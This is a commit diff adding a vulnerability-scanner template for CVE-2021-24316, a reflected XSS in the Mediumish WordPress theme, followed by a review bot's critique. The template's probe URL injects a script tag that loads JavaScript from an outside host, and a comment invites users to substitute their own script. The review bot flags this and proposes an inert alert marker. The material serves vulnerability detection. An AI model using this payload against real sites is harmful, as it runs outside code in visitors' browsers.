Create CVE-2021-24316.yaml
parent
fcbe41f23d
commit
2171f7ec21
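--- a/CVE-2021-24316.yaml
+++ b/CVE-2021-24316.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-24316
+
+info:
+author: 0x_Akoko
+description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
+name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
+severity: medium
+tags: Mediumish,xss,wordpress
+reference: |
+- https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-24316
+
+requests:
+- method: GET
+path:
+## you can edit this js file with your custom js. //m0ze.ru/payload/a2r.js decode it (base64) with your own.
+- '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E'
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+words:
+- "<script src=https://m0ze.ru/payload/a2r.js></script>"
+part: body
+
+- type: word
+words:
+- "text/html"
+part: header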
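Review bot: The probe URL under `path` and the body matcher both hard-code a `<script src=…>` that loads JavaScript from a third-party host, so every scan asks the target to reflect a reference to code the template's maintainers do not control, and the `##` comment above it invites users to substitute their own script. Detecting the flaw only requires showing that the `s` parameter is reflected unescaped, so an inert, self-contained marker is sufficient, for example `- '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'` with the matching word `- "<script>alert(document.domain)</script>"`. The comment could then become `# matcher confirms the search term is reflected without HTML encoding`. Separately, `reference: |` appears to make the entry below it a block string rather than a list, and the tags would be easier to filter on in lowercase with `cve,cve2021` added.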